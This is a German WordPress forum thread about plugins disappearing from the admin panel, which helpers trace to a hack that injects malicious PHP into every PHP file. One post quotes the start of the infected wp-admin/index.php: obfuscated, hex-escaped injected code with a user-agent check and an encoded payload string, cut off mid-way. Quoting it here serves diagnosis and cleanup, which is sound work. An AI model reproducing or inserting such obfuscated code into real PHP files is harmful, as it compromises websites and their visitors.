Plugins alle verschwunden

• Hallo Leute,

ich hoffe Ihr könnt mir helfen. Ich habe das Problem das ich bei einer WP Installation plötzlich keine Plugins angezeigt bekomme (im Backend).
    Nach dem Login hat es mir für jedes Plugin einen Fehler angezeigt so ähnlich "fehlender Header für dieses Plugin" und nun wird angezeigt das "wahrscheinlich kein Plugin installiert ist".

Per FTP sind die Plugin Ordner erreichbar und auch gefüllt. Die Rechtevergabe scheint auch in Ordnung zu sein.

Habt Ihr Lösungsvorschläge?
    Ich bedanke mich im vorraus.

• Anzeige

Hallo!

Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

• ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

Mehr erfahren

• ist vielleicht der plugins Ordner auf dem FTP-Server falsch benannt?

[size=10]Bitte immer zuerst die Forensuche nutzen und erst danach Deine Fragen hier im Forum stellen, denn sehr vieles wurde schon mehrfach beantwortet. Bitte dabei auch die Forenregeln beachten.
    Kein Support per PN - Fragen gehören ins Forum.[/SIZE]
    [size=8]Wenn du eine weise Antwort verlangst, musst du vernünftig fragen. (Johann Wolfgang von Goethe)[/SIZE]

• dann ist evtl. ein fehlerhaftes Plugin dabei. Da hilft nur alle Plugins vom Server löschen (vorher Backup machen) und dann wieder eins nach dem anderen installieren. So findet man oft den Übeltäter.

[size=10]Bitte immer zuerst die Forensuche nutzen und erst danach Deine Fragen hier im Forum stellen, denn sehr vieles wurde schon mehrfach beantwortet. Bitte dabei auch die Forenregeln beachten.
    Kein Support per PN - Fragen gehören ins Forum.[/SIZE]
    [size=8]Wenn du eine weise Antwort verlangst, musst du vernünftig fragen. (Johann Wolfgang von Goethe)[/SIZE]

• ...
    Nach dem Login hat es mir für jedes Plugin einen Fehler angezeigt so ähnlich "fehlender Header für dieses Plugin" und nun wird angezeigt das "wahrscheinlich kein Plugin installiert ist".

Per FTP sind die Plugin Ordner erreichbar und auch gefüllt. Die Rechtevergabe scheint auch in Ordnung zu sein.
    ...

Bei der Fehlerbschreibung würde ich eher von einer gehackten WP-Installation ausgehen, so wie hier:
    http://forum.wpde.org/plugins-und-wi…hp-dateien.html

Der PHP-Schadcode, der vom Hack in alle PHP-Dateien geschrieben wird, macht die Plugins aus WP-Sicht ungültig, da der Plugin-Header nicht mehr an der erwarteten Stelle zu finden ist.

Gruß
    Ingo

Wenn ich helfen konnte, bitte [ Gefällt mir ] klicken. :-)

• Ich habe eben mal die index.php aus dem wp-admin/ angeschaut, geht folgendermaßen los:

Das bedeutet nichts gutes oder??

<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $ulvgdyjbgm = '-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#48]32M3]317]445]212]445]43]321]464]284]36)!gj!|!*bubE{h%x5c%x7825)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf%x5c%x7;%x5c%x7825-qp%x5c%x7825)54l}%x5c%x7827;%x5c%787f<u%x5c%x7825V%x5c%x7827{ftmfV%x5c%x787f<*#%x5c%x7827rfs%x5c%x78pdof%x5c%x786057ftbc%x5c%x787f!|!*uyfu%x824-%x5c%x7824b!>!%x5c%x7825yy)#}#-#%x5c%x7824-%x5c%x7824-tftmbg39*56A:>:8:|:7#6#)tutjyf%x5c%x7825:-

• wie bei mir.

ich forste nun alle PHP-Dateien durch und entferne die komplette obere Zeile, bis auf das "<?php "am Schluss

Bislang sehen auch sämtliche Zeilen auch gleich aus. Wenn der Hacker ein Script zum Einfügen in jede PHP nutzte, gibts doch sicher ein Script, das die schadhafte Zeile wieder entfernt.???

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!